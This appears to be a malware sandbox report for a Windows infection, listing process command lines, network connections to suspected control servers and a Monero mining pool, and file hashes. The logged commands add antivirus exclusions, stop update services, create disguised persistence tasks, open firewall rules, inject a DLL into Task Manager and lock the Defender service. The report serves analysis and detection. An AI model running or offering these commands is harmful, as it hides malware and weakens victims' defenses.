"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2020,403383630516863929,8679515635207013333,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=8176 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2020,403383630516863929,8679515635207013333,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=8176 /prefetch:8

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2020,403383630516863929,8679515635207013333,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7960 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2020,403383630516863929,8679515635207013333,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8240 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2020,403383630516863929,8679515635207013333,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8016 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2020,403383630516863929,8679515635207013333,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7180 /prefetch:1

C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe

"C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force

C:\Users\Admin\AppData\Local\Temp\C8D1.exe

C:\Users\Admin\AppData\Local\Temp\C8D1.exe

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc

C:\Windows\System32\sc.exe

sc stop UsoSvc

C:\Windows\System32\sc.exe

sc stop WaaSMedicSvc

C:\Windows\System32\sc.exe

sc stop wuauserv

C:\Windows\System32\sc.exe

sc stop bits

C:\Windows\System32\sc.exe

sc stop dosvc

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#nvjdnn#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-dc 0

C:\Windows\System32\schtasks.exe

C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"

C:\Program Files\Google\Chrome\updater.exe

"C:\Program Files\Google\Chrome\updater.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\system32\cmd.exe

C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"

C:\Windows\system32\netsh.exe

netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\rss\csrss.exe

C:\Windows\rss\csrss.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Users\Admin\AppData\Local\Temp\925e7e99c5\pdates.exe

C:\Users\Admin\AppData\Local\Temp\925e7e99c5\pdates.exe

C:\Users\Admin\AppData\Local\Temp\e8b5234212\Utsysc.exe

C:\Users\Admin\AppData\Local\Temp\e8b5234212\Utsysc.exe

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0x8,0x108,0x7fff35c646f8,0x7fff35c64708,0x7fff35c64718

C:\Windows\SYSTEM32\schtasks.exe

schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F

C:\Windows\SYSTEM32\schtasks.exe

schtasks /delete /tn ScheduledUpdate /f

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2148,13706138524190011023,2434193042003868140,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2212 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2148,13706138524190011023,2434193042003868140,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2160 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2148,13706138524190011023,2434193042003868140,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2736 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,13706138524190011023,2434193042003868140,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3300 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,13706138524190011023,2434193042003868140,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3320 /prefetch:1

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,13706138524190011023,2434193042003868140,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4068 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,13706138524190011023,2434193042003868140,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4968 /prefetch:1

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,13706138524190011023,2434193042003868140,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3300 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,13706138524190011023,2434193042003868140,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3548 /prefetch:1

C:\Windows\System32\sc.exe

sc stop UsoSvc

C:\Windows\System32\sc.exe

sc stop WaaSMedicSvc

C:\Windows\System32\sc.exe

sc stop wuauserv

C:\Windows\System32\sc.exe

sc stop bits

C:\Windows\System32\sc.exe

sc stop dosvc

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-dc 0

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#nvjdnn#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,13706138524190011023,2434193042003868140,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5452 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2148,13706138524190011023,2434193042003868140,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4044 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2148,13706138524190011023,2434193042003868140,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4044 /prefetch:8

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll

C:\Windows\System32\conhost.exe

C:\Windows\System32\conhost.exe

C:\Windows\explorer.exe

C:\Windows\explorer.exe

C:\Windows\SYSTEM32\schtasks.exe

schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F

C:\Windows\windefender.exe

"C:\Windows\windefender.exe"

C:\Windows\SysWOW64\cmd.exe

cmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)

C:\Windows\SysWOW64\sc.exe

sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)

C:\Windows\windefender.exe

C:\Windows\windefender.exe

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe start wuauserv

Network

Country Destination Domain Proto
US 8.8.8.8:53 17.160.190.20.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 241.154.82.20.in-addr.arpa udp
US 8.8.8.8:53 59.128.231.4.in-addr.arpa udp
US 8.8.8.8:53 39.142.81.104.in-addr.arpa udp
US 8.8.8.8:53 55.36.223.20.in-addr.arpa udp
FI 77.91.68.61:80 tcp
FI 77.91.68.29:80 77.91.68.29 tcp
FI 77.91.68.249:80 77.91.68.249 tcp
RU 193.233.255.73:80 193.233.255.73 tcp
US 8.8.8.8:53 249.68.91.77.in-addr.arpa udp
US 8.8.8.8:53 73.255.233.193.in-addr.arpa udp
RU 5.42.65.80:80 5.42.65.80 tcp
US 8.8.8.8:53 80.65.42.5.in-addr.arpa udp
FI 77.91.124.86:19084 tcp
FI 77.91.124.86:19084 tcp
US 8.8.8.8:53 www.facebook.com udp
US 8.8.8.8:53 accounts.google.com udp
NL 157.240.247.35:443 www.facebook.com tcp
NL 142.251.36.45:443 accounts.google.com tcp
US 8.8.8.8:53 store.steampowered.com udp
NL 104.85.0.101:443 store.steampowered.com tcp
NL 142.251.36.45:443 accounts.google.com udp
US 8.8.8.8:53 35.247.240.157.in-addr.arpa udp
US 8.8.8.8:53 45.36.251.142.in-addr.arpa udp
US 8.8.8.8:53 twitter.com udp
US 104.244.42.65:443 twitter.com tcp
US 8.8.8.8:53 steamcommunity.com udp
JP 23.207.106.113:443 steamcommunity.com tcp
US 8.8.8.8:53 101.0.85.104.in-addr.arpa udp
US 8.8.8.8:53 65.42.244.104.in-addr.arpa udp
US 8.8.8.8:53 158.240.127.40.in-addr.arpa udp
US 8.8.8.8:53 www.epicgames.com udp
US 52.44.42.239:443 www.epicgames.com tcp
US 8.8.8.8:53 www.paypal.com udp
US 151.101.1.21:443 www.paypal.com tcp
US 8.8.8.8:53 i.ytimg.com udp
US 8.8.8.8:53 113.106.207.23.in-addr.arpa udp
US 8.8.8.8:53 239.42.44.52.in-addr.arpa udp
US 8.8.8.8:53 21.1.101.151.in-addr.arpa udp
US 8.8.8.8:53 113.39.65.18.in-addr.arpa udp
US 8.8.8.8:53 206.179.250.142.in-addr.arpa udp
NL 172.217.168.246:443 i.ytimg.com tcp
US 8.8.8.8:53 246.168.217.172.in-addr.arpa udp
US 8.8.8.8:53 106.208.58.216.in-addr.arpa udp
US 8.8.8.8:53 131.179.250.142.in-addr.arpa udp
US 8.8.8.8:53 static.xx.fbcdn.net udp
US 8.8.8.8:53 abs.twimg.com udp
US 8.8.8.8:53 api.twitter.com udp
US 8.8.8.8:53 pbs.twimg.com udp
NL 157.240.201.15:443 static.xx.fbcdn.net tcp
NL 157.240.201.15:443 static.xx.fbcdn.net tcp
NL 157.240.201.15:443 static.xx.fbcdn.net tcp
US 104.244.42.130:443 api.twitter.com tcp
US 152.199.21.141:443 abs.twimg.com tcp
US 152.199.21.141:443 abs.twimg.com tcp
US 152.199.21.141:443 abs.twimg.com tcp
US 152.199.21.141:443 abs.twimg.com tcp
US 8.8.8.8:53 t.co udp
US 8.8.8.8:53 community.akamai.steamstatic.com udp
US 93.184.220.70:443 pbs.twimg.com tcp
US 8.8.8.8:53 video.twimg.com udp
US 8.8.8.8:53 store.akamai.steamstatic.com udp
US 104.244.42.69:443 t.co tcp
NL 199.232.148.158:443 video.twimg.com tcp
NL 23.72.252.160:443 community.akamai.steamstatic.com tcp
NL 23.72.252.160:443 community.akamai.steamstatic.com tcp
NL 23.72.252.160:443 community.akamai.steamstatic.com tcp
NL 23.72.252.176:443 store.akamai.steamstatic.com tcp
NL 23.72.252.176:443 store.akamai.steamstatic.com tcp
NL 23.72.252.176:443 store.akamai.steamstatic.com tcp
FI 77.91.68.29:80 77.91.68.29 tcp
N/A 224.0.0.251:5353 udp
US 8.8.8.8:53 googleads.g.doubleclick.net udp
US 8.8.8.8:53 apps.identrust.com udp
NL 142.250.179.194:443 googleads.g.doubleclick.net tcp
US 8.8.8.8:53 15.201.240.157.in-addr.arpa udp
US 8.8.8.8:53 141.21.199.152.in-addr.arpa udp
US 8.8.8.8:53 130.42.244.104.in-addr.arpa udp
US 8.8.8.8:53 70.220.184.93.in-addr.arpa udp
US 8.8.8.8:53 158.148.232.199.in-addr.arpa udp
US 8.8.8.8:53 69.42.244.104.in-addr.arpa udp
US 8.8.8.8:53 160.252.72.23.in-addr.arpa udp
US 8.8.8.8:53 176.252.72.23.in-addr.arpa udp
NL 88.221.25.153:80 apps.identrust.com tcp
NL 88.221.25.153:80 apps.identrust.com tcp
NL 142.250.179.194:443 googleads.g.doubleclick.net udp
NL 194.169.175.118:80 194.169.175.118 tcp
US 8.8.8.8:53 rr2---sn-5hnednss.googlevideo.com udp
NL 172.217.132.199:443 rr2---sn-5hnednss.googlevideo.com tcp
NL 172.217.132.199:443 rr2---sn-5hnednss.googlevideo.com tcp
US 8.8.8.8:53 194.179.250.142.in-addr.arpa udp
US 8.8.8.8:53 153.25.221.88.in-addr.arpa udp
US 8.8.8.8:53 118.175.169.194.in-addr.arpa udp
US 8.8.8.8:53 199.132.217.172.in-addr.arpa udp
NL 172.217.132.199:443 rr2---sn-5hnednss.googlevideo.com tcp
NL 172.217.132.199:443 rr2---sn-5hnednss.googlevideo.com tcp
NL 172.217.168.246:443 i.ytimg.com udp
IT 185.196.9.171:80 185.196.9.171 tcp
US 8.8.8.8:53 171.9.196.185.in-addr.arpa udp
BG 171.22.28.213:80 171.22.28.213 tcp
US 8.8.8.8:53 213.28.22.171.in-addr.arpa udp
US 194.49.94.11:80 194.49.94.11 tcp
NL 172.217.132.199:443 rr2---sn-5hnednss.googlevideo.com tcp
NL 172.217.132.199:443 rr2---sn-5hnednss.googlevideo.com tcp
US 8.8.8.8:53 11.94.49.194.in-addr.arpa udp
US 8.8.8.8:53 yt3.ggpht.com udp
US 8.8.8.8:53 i4.ytimg.com udp
NL 142.251.36.1:443 yt3.ggpht.com tcp
NL 142.251.36.1:443 yt3.ggpht.com tcp
NL 142.251.36.1:443 yt3.ggpht.com tcp
DE 172.217.23.206:443 i4.ytimg.com tcp
DE 172.217.23.206:443 i4.ytimg.com tcp
US 8.8.8.8:53 iplogger.com udp
DE 148.251.234.93:443 iplogger.com tcp
US 8.8.8.8:53 1.36.251.142.in-addr.arpa udp
US 8.8.8.8:53 206.23.217.172.in-addr.arpa udp
US 8.8.8.8:53 196.168.217.172.in-addr.arpa udp
US 8.8.8.8:53 93.234.251.148.in-addr.arpa udp
DE 167.235.20.126:80 167.235.20.126 tcp
DE 167.235.20.126:80 167.235.20.126 tcp
US 8.8.8.8:53 126.20.235.167.in-addr.arpa udp
US 8.8.8.8:53 jnn-pa.googleapis.com udp
NL 142.251.36.42:443 jnn-pa.googleapis.com tcp
US 8.8.8.8:53 static.doubleclick.net udp
NL 142.251.36.6:443 static.doubleclick.net tcp
NL 142.251.36.6:443 static.doubleclick.net tcp
NL 142.251.36.42:443 jnn-pa.googleapis.com udp
US 8.8.8.8:53 42.36.251.142.in-addr.arpa udp
US 8.8.8.8:53 6.36.251.142.in-addr.arpa udp
US 8.8.8.8:53 api.ip.sb udp
US 172.67.75.172:443 api.ip.sb tcp
US 8.8.8.8:53 youtube.com udp
NL 216.58.214.14:443 youtube.com tcp
US 8.8.8.8:53 172.75.67.172.in-addr.arpa udp
FI 77.91.68.61:80 tcp
US 8.8.8.8:53 121.252.72.23.in-addr.arpa udp
FI 77.91.124.86:19084 tcp
DE 167.235.20.126:80 167.235.20.126 tcp
FI 77.91.124.86:19084 tcp
US 8.8.8.8:53 static-assets-prod.unrealengine.com udp
US 8.8.8.8:53 tracking.epicgames.com udp
US 8.8.8.8:53 static.ads-twitter.com udp
US 8.8.8.8:53 www.paypalobjects.com udp
NL 199.232.148.157:443 static.ads-twitter.com tcp
US 192.229.221.25:443 www.paypalobjects.com tcp
US 192.229.221.25:443 www.paypalobjects.com tcp
US 192.229.221.25:443 www.paypalobjects.com tcp
US 44.209.232.36:443 tracking.epicgames.com tcp
US 18.239.36.105:443 static-assets-prod.unrealengine.com tcp
US 18.239.36.105:443 static-assets-prod.unrealengine.com tcp
US 44.209.232.36:443 tracking.epicgames.com tcp
US 18.239.36.105:443 static-assets-prod.unrealengine.com tcp
US 8.8.8.8:53 157.148.232.199.in-addr.arpa udp
US 8.8.8.8:53 25.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 105.36.239.18.in-addr.arpa udp
US 8.8.8.8:53 36.232.209.44.in-addr.arpa udp
DE 167.235.20.126:80 167.235.20.126 tcp
US 192.229.221.25:443 www.paypalobjects.com tcp
US 8.8.8.8:53 facebook.com udp
US 18.239.36.105:443 static-assets-prod.unrealengine.com tcp
IE 163.70.151.35:443 facebook.com tcp
US 8.8.8.8:53 35.151.70.163.in-addr.arpa udp
US 8.8.8.8:53 fbcdn.net udp
US 8.8.8.8:53 www.recaptcha.net udp
NL 23.72.252.176:443 store.akamai.steamstatic.com tcp
NL 23.72.252.176:443 store.akamai.steamstatic.com tcp
NL 23.72.252.176:443 store.akamai.steamstatic.com tcp
NL 142.250.179.163:443 www.recaptcha.net tcp
IE 163.70.151.35:443 fbcdn.net tcp
US 8.8.8.8:53 fbsbx.com udp
NL 142.250.179.163:443 www.recaptcha.net udp
US 8.8.8.8:53 163.179.250.142.in-addr.arpa udp
FI 77.91.68.29:80 77.91.68.29 tcp
FI 77.91.68.61:80 tcp
US 8.8.8.8:53 19.229.111.52.in-addr.arpa udp
US 8.8.8.8:53 api.steampowered.com udp
JP 23.207.106.113:443 api.steampowered.com tcp
US 8.8.8.8:53 play.google.com udp
NL 142.251.36.14:443 play.google.com tcp
NL 142.251.36.14:443 play.google.com udp
US 8.8.8.8:53 14.36.251.142.in-addr.arpa udp
FI 77.91.124.86:19084 tcp
FI 77.91.124.86:19084 tcp
US 8.8.8.8:53 rr5---sn-5hne6ns6.googlevideo.com udp
NL 209.85.226.106:443 rr5---sn-5hne6ns6.googlevideo.com tcp
NL 209.85.226.106:443 rr5---sn-5hne6ns6.googlevideo.com tcp
NL 209.85.226.106:443 rr5---sn-5hne6ns6.googlevideo.com udp
US 8.8.8.8:53 106.226.85.209.in-addr.arpa udp
US 8.8.8.8:53 jnn-pa.googleapis.com udp
DE 172.217.23.202:443 jnn-pa.googleapis.com udp
US 8.8.8.8:53 202.23.217.172.in-addr.arpa udp
US 8.8.8.8:53 c.paypal.com udp
RU 195.10.205.17:8122 tcp
US 8.8.8.8:53 login.steampowered.com udp
JP 23.207.106.113:443 login.steampowered.com tcp
US 8.8.8.8:53 host-file-host6.com udp
US 8.8.8.8:53 host-host-file8.com udp
US 95.214.26.28:80 host-host-file8.com tcp
US 8.8.8.8:53 17.205.10.195.in-addr.arpa udp
US 8.8.8.8:53 28.26.214.95.in-addr.arpa udp
US 8.8.8.8:53 t.paypal.com udp
US 192.55.233.1:443 tcp
US 192.55.233.1:443 tcp
US 8.8.8.8:53 34.36.251.142.in-addr.arpa udp
US 8.8.8.8:53 sentry.io udp
US 35.186.247.156:443 sentry.io tcp
US 8.8.8.8:53 156.247.186.35.in-addr.arpa udp
US 8.8.8.8:53 www.paypal.com udp
US 8.8.8.8:53 b.stats.paypal.com udp
US 64.4.245.84:443 b.stats.paypal.com tcp
US 8.8.8.8:53 84.245.4.64.in-addr.arpa udp
US 8.8.8.8:53 5e06a85b-952b-4c2d-aef0-cd985d519beb.uuid.theupdatetime.org udp
FI 77.91.124.86:19084 tcp
FI 77.91.124.86:19084 tcp
US 8.8.8.8:53 xmr-eu1.nanopool.org udp
PL 51.68.143.81:14433 xmr-eu1.nanopool.org tcp
US 8.8.8.8:53 81.143.68.51.in-addr.arpa udp
US 8.8.8.8:53 pastebin.com udp
US 104.20.67.143:443 pastebin.com tcp
NL 51.15.65.182:14433 xmr-eu1.nanopool.org tcp
US 8.8.8.8:53 143.67.20.104.in-addr.arpa udp
US 8.8.8.8:53 182.65.15.51.in-addr.arpa udp
US 8.8.8.8:53 server1.theupdatetime.org udp
US 8.8.8.8:53 cdn.discordapp.com udp
US 8.8.8.8:53 stun2.l.google.com udp
US 162.159.133.233:443 cdn.discordapp.com tcp
BG 185.82.216.108:443 server1.theupdatetime.org tcp
IN 172.253.121.127:19302 stun2.l.google.com udp
US 8.8.8.8:53 127.121.253.172.in-addr.arpa udp
US 8.8.8.8:53 walkinglate.com udp
US 188.114.96.0:443 walkinglate.com tcp
US 8.8.8.8:53 233.133.159.162.in-addr.arpa udp
US 8.8.8.8:53 108.216.82.185.in-addr.arpa udp
US 8.8.8.8:53 0.96.114.188.in-addr.arpa udp
US 8.8.8.8:53 7.173.189.20.in-addr.arpa udp
BG 185.82.216.108:443 server1.theupdatetime.org tcp
FI 77.91.124.86:19084 tcp
FI 77.91.124.86:19084 tcp

Files

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v1106597.exe

MD5 45a3bb26ea6be74edc125030beeef437
SHA1 366fe6443678f62e564919e1b0043f8a3d4072d2
SHA256 3d426ba7313007978b404b0a54ac66c53d62a851b9992e5b53e8b21f5e0dcc12
SHA512 470b71f2a97ae47b6e5fbc717b4df2bac37882890be99e3ced126104747f9d601fe62202cd00989e0e13e689e107030a9a60edc23e176ec9c97e67abc756d320

